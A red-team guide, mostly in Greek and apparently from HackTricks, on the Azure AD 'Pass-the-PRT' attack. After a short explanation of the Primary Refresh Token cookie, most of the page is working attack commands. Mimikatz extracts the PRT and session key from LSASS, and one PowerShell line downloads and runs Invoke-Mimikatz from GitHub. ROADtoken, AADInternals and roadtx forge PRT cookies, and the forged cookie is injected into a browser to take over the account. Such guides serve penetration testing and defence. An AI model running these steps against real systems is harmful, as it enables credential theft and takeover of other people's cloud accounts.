Az - Pass the PRT

Τι είναι το PRT

Ελέγξτε αν έχετε PRT

Dsregcmd.exe /status

Στην ενότητα SSO State, θα πρέπει να δείτε το AzureAdPrt ρυθμισμένο σε ΝΑΙ.

Στην ίδια έξοδο μπορείτε επίσης να δείτε αν η συσκευή είναι συνδεδεμένη στο Azure (στο πεδίο AzureAdJoined):

PRT Cookie

Το cookie PRT ονομάζεται στην πραγματικότητα x-ms-RefreshTokenCredential και είναι ένα JSON Web Token (JWT). Ένα JWT περιέχει 3 μέρη, το header, το payload και την υπογραφή, χωρισμένα με ένα . και όλα κωδικοποιημένα σε url-safe base64. Ένα τυπικό cookie PRT περιέχει το εξής header και σώμα:

{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}

Το πραγματικό Primary Refresh Token (PRT) είναι ενσωματωμένο μέσα στο refresh_token, το οποίο είναι κρυπτογραφημένο με ένα κλειδί υπό τον έλεγχο του Azure AD, καθιστώντας το περιεχόμενό του αδιαφανές και μη αποκρυπτογραφημένο για εμάς. Το πεδίο is_primary σηματοδοτεί την ενσωμάτωση του κύριου refresh token μέσα σε αυτό το token. Για να διασφαλιστεί ότι το cookie παραμένει συνδεδεμένο με τη συγκεκριμένη συνεδρία σύνδεσης για την οποία προοριζόταν, το request_nonce μεταδίδεται από τη σελίδα logon.microsoftonline.com.

Ροή Cookie PRT χρησιμοποιώντας TPM

Η διαδικασία LSASS θα στείλει στο TPM το KDF context, και το TPM θα χρησιμοποιήσει το session key (που συγκεντρώθηκε όταν η συσκευή καταχωρίστηκε στο AzureAD και αποθηκεύτηκε στο TPM) και το προηγούμενο context για να παράγει ένα κλειδί, και αυτό το παραγόμενο κλειδί χρησιμοποιείται για να υπογράψει το PRT cookie (JWT).

Το KDF context είναι ένα nonce από το AzureAD και το PRT που δημιουργεί ένα JWT αναμειγμένο με ένα context (τυχαία bytes).

Επομένως, ακόμη και αν το PRT δεν μπορεί να εξαχθεί επειδή βρίσκεται μέσα στο TPM, είναι δυνατόν να καταχραστεί το LSASS για να ζητήσει παραγόμενα κλειδιά από νέα contexts και να χρησιμοποιήσει τα παραγόμενα κλειδιά για να υπογράψει Cookies.

Σενάρια Κατάχρησης PRT

Ως κανονικός χρήστης είναι δυνατόν να ζητήσετε τη χρήση PRT ζητώντας από το LSASS δεδομένα SSO. Αυτό μπορεί να γίνει όπως οι εγγενείς εφαρμογές που ζητούν tokens από τον Web Account Manager (token broker). Ο WAM μεταβιβάζει το αίτημα στο LSASS, το οποίο ζητά tokens χρησιμοποιώντας υπογεγραμμένη δήλωση PRT. Ή μπορεί να γίνει με ροές βασισμένες σε πρόγραμμα περιήγησης (web) όπου ένα PRT cookie χρησιμοποιείται ως header για την αυθεντικοποίηση αιτημάτων στις σελίδες σύνδεσης Azure AS.

Ως SYSTEM θα μπορούσατε να κλέψετε το PRT αν δεν προστατεύεται από TPM ή να αλληλεπιδράσετε με τα κλειδιά PRT στο LSASS χρησιμοποιώντας κρυπτογραφικές APIs.

Παραδείγματα Επίθεσης Pass-the-PRT

Επίθεση - ROADtoken

Για περισσότερες πληροφορίες σχετικά με αυτόν τον τρόπο ελέγξτε αυτήν την ανάρτηση. Το ROADtoken θα εκτελέσει το BrowserCore.exe από τον σωστό κατάλογο και θα το χρησιμοποιήσει για να αποκτήσει ένα PRT cookie. Αυτό το cookie μπορεί στη συνέχεια να χρησιμοποιηθεί με τα ROADtools για να αυθεντικοποιηθεί και να αποκτηθεί ένα μόνιμο refresh token.

Για να δημιουργήσετε ένα έγκυρο PRT cookie, το πρώτο πράγμα που χρειάζεστε είναι ένα nonce. Μπορείτε να το αποκτήσετε με:

$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"

$Params = @{
"URI"     = $URL
"Method"  = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA

Ή χρησιμοποιώντας roadrecon:

roadrecon auth prt-init

Τότε μπορείτε να χρησιμοποιήσετε roadtoken για να αποκτήσετε ένα νέο PRT (τρέξτε το εργαλείο από μια διαδικασία του χρήστη που θέλετε να επιτεθείτε):

.\ROADtoken.exe <nonce>

Ως oneliner:

Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}

Στη συνέχεια, μπορείτε να χρησιμοποιήσετε το παραγόμενο cookie για να παράγετε tokens για να συνδεθείτε χρησιμοποιώντας Azure AD Graph ή Microsoft Graph:

# Generate
roadrecon auth --prt-cookie <prt_cookie>

# Connect
Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>

Επίθεση - Χρησιμοποιώντας roadrecon

Επίθεση - Χρησιμοποιώντας AADInternals και ένα leaked PRT

Get-AADIntUserPRTToken λαμβάνει το PRT token του χρήστη από τον υπολογιστή που είναι συνδεδεμένος στο Azure AD ή Hybrid. Χρησιμοποιεί το BrowserCore.exe για να αποκτήσει το PRT token.

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Ή αν έχετε τις τιμές από το Mimikatz μπορείτε επίσης να χρησιμοποιήσετε το AADInternals για να δημιουργήσετε ένα token:

# Mimikat "PRT" value
$MimikatzPRT="MC5BWU..."

# Add padding
while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}

# Decode
$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Mimikatz "Clear key" value
$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"

# Convert to Byte array and B64 encode
$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate PRTToken with Nonce
$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
$prtToken
## You can already use this token ac cookie in the browser

# Get access token from prtToken
$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken

# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>

Μεταβείτε στο https://login.microsoftonline.com, διαγράψτε όλα τα cookies για το login.microsoftonline.com και εισάγετε ένα νέο cookie.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Then go to https://portal.azure.com

Attack - Mimikatz

Steps

1. Το PRT (Primary Refresh Token) εξάγεται από το LSASS (Local Security Authority Subsystem Service) και αποθηκεύεται για μελλοντική χρήση.

2. Το Session Key εξάγεται στη συνέχεια. Δεδομένου ότι αυτό το κλειδί εκδίδεται αρχικά και στη συνέχεια επανακρυπτογραφείται από τη τοπική συσκευή, απαιτεί αποκρυπτογράφηση χρησιμοποιώντας ένα DPAPI masterkey. Λεπτομερείς πληροφορίες σχετικά με το DPAPI (Data Protection API) μπορείτε να βρείτε σε αυτούς τους πόρους: HackTricks και για κατανόηση της εφαρμογής του, ανατρέξτε στην επίθεση Pass-the-cookie.

3. Μετά την αποκρυπτογράφηση του Session Key, το παράγωγο κλειδί και το πλαίσιο για το PRT αποκτώνται. Αυτά είναι κρίσιμα για τη δημιουργία του cookie PRT. Συγκεκριμένα, το παράγωγο κλειδί χρησιμοποιείται για την υπογραφή του JWT (JSON Web Token) που συνιστά το cookie. Μια ολοκληρωμένη εξήγηση αυτής της διαδικασίας έχει παρασχεθεί από τον Dirk-jan, προσβάσιμη εδώ.

You can find an in depth explanation of the performed process to extract these details in here: https://dirkjanm.io/digging-further-into-the-primary-refresh-token/

You can use mimikatz to extract the PRT:

mimikatz.exe
Privilege::debug
Sekurlsa::cloudap

# Or in powershell
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'

(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)

Αντιγράψτε το μέρος που είναι επισημασμένο Prt και αποθηκεύστε το. Εξαγάγετε επίσης το κλειδί συνεδρίας (το KeyValue του πεδίου ProofOfPossesionKey) το οποίο μπορείτε να δείτε επισημασμένο παρακάτω. Αυτό είναι κρυπτογραφημένο και θα χρειαστεί να χρησιμοποιήσουμε τα DPAPI masterkeys μας για να το αποκρυπτογραφήσουμε.

Για να αποκρυπτογραφήσετε το κλειδί συνεδρίας, πρέπει να ανυψώσετε τα δικαιώματά σας σε SYSTEM για να εκτελείστε υπό το πλαίσιο του υπολογιστή ώστε να μπορείτε να χρησιμοποιήσετε το DPAPI masterkey για να το αποκρυπτογραφήσετε. Μπορείτε να χρησιμοποιήσετε τις παρακάτω εντολές για να το κάνετε αυτό:

token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Επιλογή 1 - Πλήρης Mimikatz

• Τώρα θέλετε να αντιγράψετε και την τιμή Context:

• Και την τιμή του παραγόμενου κλειδιού:

• Τέλος, μπορείτε να χρησιμοποιήσετε όλες αυτές τις πληροφορίες για να δημιουργήσετε PRT cookies:

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]

• Πηγαίνετε στο https://login.microsoftonline.com, καθαρίστε όλα τα cookies για το login.microsoftonline.com και εισάγετε ένα νέο cookie.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

• Στη συνέχεια, πηγαίνετε στο https://portal.azure.com

Επιλογή 2 - roadrecon χρησιμοποιώντας PRT

• Ανανεώστε πρώτα το PRT, το οποίο θα αποθηκευτεί στο roadtx.prt:

roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>

• Τώρα μπορούμε να ζητήσουμε tokens χρησιμοποιώντας τον διαδραστικό περιηγητή με roadtx browserprtauth. Αν χρησιμοποιήσουμε την εντολή roadtx describe, βλέπουμε ότι το access token περιλαμβάνει μια αξίωση MFA επειδή το PRT που χρησιμοποίησα σε αυτή την περίπτωση είχε επίσης μια αξίωση MFA.

roadtx browserprtauth
roadtx describe < .roadtools_auth

Επιλογή 3 - roadrecon χρησιμοποιώντας παραγόμενα κλειδιά

Έχοντας το πλαίσιο και το παραγόμενο κλειδί που εξήχθη από το mimikatz, είναι δυνατόν να χρησιμοποιηθεί το roadrecon για να παραχθεί ένα νέο υπογεγραμμένο cookie με:

roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>

Αναφορές

• https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/

• https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/

• https://www.youtube.com/watch?v=x609c-MUZ_g